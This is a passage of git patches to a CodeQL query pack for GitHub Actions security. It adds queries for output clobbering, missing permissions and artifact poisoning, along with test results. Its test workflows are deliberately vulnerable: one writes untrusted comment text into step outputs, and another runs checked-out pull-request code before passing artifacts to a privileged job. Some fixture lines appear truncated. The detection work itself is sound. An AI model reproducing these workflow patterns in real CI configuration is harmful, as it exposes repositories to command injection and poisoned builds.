succ.asExpr() = e - ) +/** + * A taint-tracking configuration for unsafe user input + * that is used to construct and evaluate an environment variable. + */ +private module OutputClobberingConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + not source.(RemoteFlowSource).getSourceType() = "branch" } + + predicate isSink(DataFlow::Node sink) { sink instanceof OutputClobberingSink } } -/** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ +/** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */ module OutputClobberingFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-077/OutputClobberingHigh.ql b/ql/src/Security/CWE-077/OutputClobberingHigh.ql new file mode 100644 index 000000000000..a7016a50c58e --- /dev/null +++ b/ql/src/Security/CWE-077/OutputClobberingHigh.ql @@ -0,0 +1,37 @@ +/** + * @name Output Clobbering + * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable. + * @kind path-problem + * @problem.severity error + * @security-severity 7.3 + * @precision high + * @id actions/output-clobbering/high + * @tags actions + * security + * experimental + * external/cwe/cwe-094 + * external/cwe/cwe-095 + * external/cwe/cwe-116 + */ + +import actions +import codeql.actions.security.OutputClobberingQuery +import codeql.actions.dataflow.ExternalFlow +import OutputClobberingFlow::PathGraph + +from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink +where + OutputClobberingFlow::flowPath(source, sink) and + inPrivilegedContext(sink.getNode().asExpr()) and + // exclude paths to file read sinks from non-artifact sources + ( + not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" + or + source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and + ( + sink.getNode() instanceof OutputClobberingFromFileReadSink or + madSink(sink.getNode(), "output-clobbering") + ) + ) +select sink.getNode(), source, sink, "Potential clobbering of a step output in $@.", sink, + sink.getNode().toString() diff --git a/ql/src/Security/CWE-094/OutputClobberingMedium.ql b/ql/src/Security/CWE-094/OutputClobberingMedium.ql deleted file mode 100644 index 7094a7891da1..000000000000 --- a/ql/src/Security/CWE-094/OutputClobberingMedium.ql +++ /dev/null @@ -1,31 +0,0 @@ -/** - * @name Output Clobbering - * @description A Step output can be clobbered which may allow an attacker to manipulate the expected and trusted values of a variable. - * @kind path-problem - * @problem.severity warning - * @security-severity 5.0 - * @precision medium - * @id actions/output-clobbering/medium - * @tags actions - * security - * external/cwe/cwe-094 - * external/cwe/cwe-095 - * external/cwe/cwe-116 - */ - -import actions -import codeql.actions.security.OutputClobberingQuery -import OutputClobberingFlow::PathGraph - -from OutputClobberingFlow::PathNode source, OutputClobberingFlow::PathNode sink -where - OutputClobberingFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr()) and - // exclude cases where the sink is a JS script and the expression uses toJson - not exists(UsesStep script | - script.getCallee() = "actions/github-script" and - script.getArgumentExpr("script") = sink.getNode().asExpr() and - exists(getAToJsonReferenceExpression(sink.getNode().asExpr().(Expression).getExpression(), _)) - ) -select sink.getNode(), source, sink, "Potential output clobbering leading to code injection in $@.", - sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml new file mode 100644 index 000000000000..df5837249984 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/output1.yml @@ -0,0 +1,38 @@ +on: + issue_comment: +jobs: + test1: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # VULNERABLE + echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + - id: clob2 + run: | + echo ${{ steps.clob1.outputs.OUTPUT_1 }} + echo ${{ steps.clob1.outputs.OUTPUT_2 }} + test2: + runs-on: ubuntu-latest + steps: + - id: clob1 + env: + BODY: ${{ github.event.comment.body }} + run: | + # NOT VULNERABLE + echo "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT + test3: + runs-on: ubuntu-latest + steps: + - name: Download artifact + uses: dawidd6/action-download-artifact@v6 + with: + run_id: ${{ github.event.workflow_run.id }} + name: pr_number + - id: clob1 + run: | + echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT + echo "OUTPUT_2=$(> $GITHUB_OUTPUT diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected new file mode 100644 index 000000000000..ea3261450eca --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.expected @@ -0,0 +1,12 @@ +edges +| .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | provenance | | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | provenance | | +nodes +| .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | semmle.label | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:30:9:35:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | semmle.label | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | +subpaths +#select +| .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:9:18:9:49 | github.event.comment.body | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:10:14:13:50 | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | # VULNERABLE\necho "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$BODY" >> $GITHUB_OUTPUT\n | +| .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | .github/workflows/output1.yml:30:9:35:6 | Uses Step | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | Potential clobbering of a step output in $@. | .github/workflows/output1.yml:36:14:38:58 | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | echo "OUTPUT_1=HARDCODED" >> $GITHUB_OUTPUT\necho "OUTPUT_2=$(> $GITHUB_OUTPUT\n | diff --git a/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref new file mode 100644 index 000000000000..5af047eec9e1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/OutputClobberingHigh.qlref @@ -0,0 +1 @@ +Security/CWE-077/OutputClobberingHigh.ql From f5261237a46cc27d3b474f5831813eff2de1081e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 10:27:28 +0200 Subject: [PATCH 432/707] feat(suites): Add a bughalla-specific query suite --- ql/src/codeql-suites/actions-bughalla.qls | 6 ++++++ 1 file changed, 6 insertions(+) create mode 100644 ql/src/codeql-suites/actions-bughalla.qls diff --git a/ql/src/codeql-suites/actions-bughalla.qls b/ql/src/codeql-suites/actions-bughalla.qls new file mode 100644 index 000000000000..0d718fac616e --- /dev/null +++ b/ql/src/codeql-suites/actions-bughalla.qls @@ -0,0 +1,6 @@ +- description: Bughalla queries for Actions +- queries: '.' +- exclude: + tags contain: + - debug + From bf10603b5fafdfe75c10c0d786c4aeb4eccb4078 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 10:28:15 +0200 Subject: [PATCH 433/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 395b875e1be5..7daf7247f259 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.25 +version: 0.1.26 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 290b58482bc4..b844148e7a21 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.25 +version: 0.1.26 groups: [actions, queries] suites: codeql-suites extractor: javascript From 65ad387543d2aba815f7aa4966e81b82c0868963 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 18:18:22 +0200 Subject: [PATCH 434/707] fix: Add printf as an equivalent to echo --- ql/lib/codeql/actions/Helper.qll | 22 +++++++++---------- .../security/EnvPathInjectionQuery.qll | 3 ++- .../actions/security/EnvVarInjectionQuery.qll | 3 ++- .../security/OutputClobberingQuery.qll | 3 ++- 4 files changed, 17 insertions(+), 14 deletions(-) diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index b08b62c8a583..cd964a6621d7 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -74,7 +74,7 @@ predicate extractVariableAndValue(string raw_content, string key, string value) bindingset[script] predicate singleLineFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | - regexp = "(?i)(echo|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and + regexp = "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>)\\s*(\\S+)" and cmd = script.regexpCapture(regexp, 1) and file = trimQuotes(script.regexpCapture(regexp, 4)) and filters = "" and @@ -85,12 +85,12 @@ predicate singleLineFileWrite(string script, string cmd, string file, string con bindingset[script] predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { exists(string regexp | - regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = script.regexpCapture(regexp, 4) and value = trimQuotes(script.regexpCapture(regexp, 5)) or - regexp = "(?i)(echo|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = "" and value = trimQuotes(script.regexpCapture(regexp, 4)) @@ -119,17 +119,17 @@ bindingset[script] predicate linesFileWrite(string script, string cmd, string file, string content, string filters) { exists(string regexp | regexp = - "(?msi).*(echo\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + + "(?msi).*((echo|printf)\\s+['|\"]?(.*?<<(\\S+))['|\"]?\\s*>>\\s*(\\S+)\\s*[\r\n]+)" + "(((.*?)\\s*>>\\s*\\S+\\s*[\r\n]+)+)" + - "(echo\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and + "((echo|printf)\\s+['|\"]?(EOF)['|\"]?\\s*>>\\s*\\S+\\s*[\r\n]*).*" and content = - trimQuotes(script.regexpCapture(regexp, 2)) + "\n" + "$(" + - trimQuotes(script.regexpCapture(regexp, 5)) + + trimQuotes(script.regexpCapture(regexp, 3)) + "\n" + "$(" + + trimQuotes(script.regexpCapture(regexp, 6)) + // TODO: there are some >> $GITHUB_ENV, >> $GITHUB_OUTPUT, >> "$GITHUB_ENV" lefotvers in content //.regexpReplaceAll("\\s*(>|>>)\\s*\\$[{]*" + file + "(.*?)[}]*", "") - ")\n" + trimQuotes(script.regexpCapture(regexp, 3)) and + ")\n" + trimQuotes(script.regexpCapture(regexp, 4)) and cmd = "echo" and - file = trimQuotes(script.regexpCapture(regexp, 4)) and + file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" ) } @@ -146,8 +146,8 @@ predicate blockFileWrite(string script, string cmd, string file, string content, content = script .regexpCapture(regexp, 1) - .regexpReplaceAll("(?m)^[ ]*echo\\s*['\"](.*?)['\"]", "$1") - .regexpReplaceAll("(?m)^[ ]*echo\\s*", "") and + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*['\"](.*?)['\"]", "$2") + .regexpReplaceAll("(?m)^\\s*(echo|printf|write-output)\\s*", "") and file = trimQuotes(script.regexpCapture(regexp, 4)) and cmd = "echo" and filters = "" diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index ee9f4843470f..fc45b8c041d0 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -35,7 +35,8 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or - value.matches("$(echo %") and value.indexOf(var_name) > 0 + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 ) ) ) diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 652b97b887f5..f7a9283f8002 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -37,7 +37,8 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or - value.matches("$(echo %") and value.indexOf(var_name) > 0 + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 ) ) ) diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index a67be6e35627..4fe3268c00af 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll @@ -44,7 +44,8 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { ( value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") or - value.matches("$(echo %") and value.indexOf(var_name) > 0 + value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and + value.indexOf(var_name) > 0 ) ) ) From 8ffac2935e609166d772db15342b9084cbd04527 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 30 Jul 2024 18:22:20 +0200 Subject: [PATCH 435/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 7daf7247f259..93f6688d2b41 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.26 +version: 0.1.27 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b844148e7a21..6ceb57f09461 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.26 +version: 0.1.27 groups: [actions, queries] suites: codeql-suites extractor: javascript From ab8dd599b75f77aec1ca76c3f67a2a013d9aebcd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 11:45:30 +0200 Subject: [PATCH 436/707] fix(queries): Fix Missing Permissions query If a job is only triggered by `workflow_call`, we dont report any issues since they should be reported on the calling workflows --- .../CWE-275/MissingActionsPermissions.ql | 12 +++++++----- .../workflows/{missing_perms.yml => perms1.yml} | 0 .../CWE-275/.github/workflows/perms2.yml | 16 ++++++++++++++++ .../.github/workflows/{perms.yml => perms3.yml} | 0 .../CWE-275/.github/workflows/perms4.yml | 11 +++++++++++ .../CWE-275/.github/workflows/perms5.yml | 12 ++++++++++++ .../CWE-275/MissingActionsPermissions.expected | 4 +++- 7 files changed, 49 insertions(+), 6 deletions(-) rename ql/test/query-tests/Security/CWE-275/.github/workflows/{missing_perms.yml => perms1.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml rename ql/test/query-tests/Security/CWE-275/.github/workflows/{perms.yml => perms3.yml} (100%) create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml create mode 100644 ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql index ffb217739c75..d2969b7d6e72 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.ql +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql @@ -13,11 +13,13 @@ import actions -from Workflow workflow, Job job +from Job job where - job = workflow.getAJob() and - ( - not exists(workflow.getPermissions()) and - not exists(job.getPermissions()) + not exists(job.getPermissions()) and + not exists(job.getEnclosingWorkflow().getPermissions()) and + // exists a trigger event that is not a workflow_call + exists(Event e | + e = job.getATriggerEvent() and + not e.getName() = "workflow_call" ) select job, "Actions Job or Workflow does not set permissions" diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-275/.github/workflows/missing_perms.yml rename to ql/test/query-tests/Security/CWE-275/.github/workflows/perms1.yml diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml new file mode 100644 index 000000000000..6f7844f17cb2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms2.yml @@ -0,0 +1,16 @@ +on: + pull_request + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + test: + name: Build and test + runs-on: ubuntu-latest + permissions: {} + steps: + - uses: actions/checkout@v2 + diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-275/.github/workflows/perms.yml rename to ql/test/query-tests/Security/CWE-275/.github/workflows/perms3.yml diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml new file mode 100644 index 000000000000..16930cfb07c8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms4.yml @@ -0,0 +1,11 @@ +on: + workflow_call: + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml new file mode 100644 index 000000000000..4353c2804976 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-275/.github/workflows/perms5.yml @@ -0,0 +1,12 @@ +on: + workflow_call: + workflow_dispatch: + +jobs: + build: + name: Build and test + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + + diff --git a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected index c26769a692e9..8f94d0dc45a6 100644 --- a/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected +++ b/ql/test/query-tests/Security/CWE-275/MissingActionsPermissions.expected @@ -1 +1,3 @@ -| .github/workflows/missing_perms.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms1.yml:6:5:9:32 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms2.yml:6:5:10:2 | Job: build | Actions Job or Workflow does not set permissions | +| .github/workflows/perms5.yml:7:5:10:32 | Job: build | Actions Job or Workflow does not set permissions | From d548aef3e068e35562095e4a119f9434659a46d0 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 31 Jul 2024 16:31:15 +0200 Subject: [PATCH 437/707] feat(queries): Add actions/download-artifact as a source of Artifact Poisoning --- .../security/ArtifactPoisoningQuery.qll | 18 ++++++++--- .../.github/workflows/artifactpoisoning81.yml | 31 +++++++++++++++++++ .../.github/workflows/artifactpoisoning82.yml | 31 +++++++++++++++++++ .../ArtifactPoisoningCritical.expected | 7 +++++ .../CWE-829/ArtifactPoisoningMedium.expected | 7 +++++ .../UntrustedCheckoutCritical.expected | 6 ++++ .../CWE-829/UntrustedCheckoutMedium.expected | 2 ++ 7 files changed, 98 insertions(+), 4 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index 541498ae574c..08a49ab1abbf 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll @@ -18,11 +18,21 @@ abstract class UntrustedArtifactDownloadStep extends Step { class GitHubDownloadArtifactActionStep extends UntrustedArtifactDownloadStep, UsesStep { GitHubDownloadArtifactActionStep() { - // By default, the permissions are scoped so they can only download Artifacts within the current workflow run. - // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers this.getCallee() = "actions/download-artifact" and - this.getArgument("run-id").matches("%github.event.workflow_run.id%") and - exists(this.getArgument("github-token")) + ( + // By default, the permissions are scoped so they can only download Artifacts within the current workflow run. + // To elevate permissions for this scenario, you can specify a github-token along with other repository and run identifiers + this.getArgument("run-id").matches("%github.event.workflow_run.id%") and + exists(this.getArgument("github-token")) + or + // There is an artifact upload step in the same workflow which can be influenced by an attacker on a checkout step + exists(UsesStep checkout, UsesStep upload | + this.getEnclosingWorkflow().getAJob().(LocalJob).getAStep() = checkout and + checkout.getCallee() = "actions/checkout" and + checkout.getAFollowingStep() = upload and + upload.getCallee() = "actions/upload-artifact" + ) + ) } override string getPath() { diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml new file mode 100644 index 000000000000..7aa190007d8a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning81.yml @@ -0,0 +1,31 @@ +name: elevate +on: + - pull_request_target + +jobs: + job1: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + bash script.sh + - uses: actions/upload-artifact@v4 + with: + name: results + path: results + retention-days: 1 + + job2: + runs-on: ubuntu-latest + needs: job1 + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: results + - run: python test.py diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml new file mode 100644 index 000000000000..6ae7f482f55f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning82.yml @@ -0,0 +1,31 @@ +name: elevate +on: + - pull_request + +jobs: + job1: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} + - run: | + bash script.sh + - uses: actions/upload-artifact@v4 + with: + name: results + path: results + retention-days: 1 + + job2: + runs-on: ubuntu-latest + needs: job1 + permissions: + contents: write + steps: + - uses: actions/download-artifact@v4 + with: + name: results + - run: python test.py diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected index c987f63115a1..56ec92c54b6c 100644 --- a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected @@ -13,6 +13,8 @@ edges | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | provenance | | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | provenance | | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -42,6 +44,10 @@ nodes | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | semmle.label | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | semmle.label | sed -f config foo.md > bar.md\n | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | semmle.label | python test.py | +| .github/workflows/artifactpoisoning82.yml:28:9:31:6 | Uses Step | semmle.label | Uses Step | +| .github/workflows/artifactpoisoning82.yml:31:14:31:27 | python test.py | semmle.label | python test.py | subpaths #select | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | @@ -58,3 +64,4 @@ subpaths | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential artifact poisoning in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> 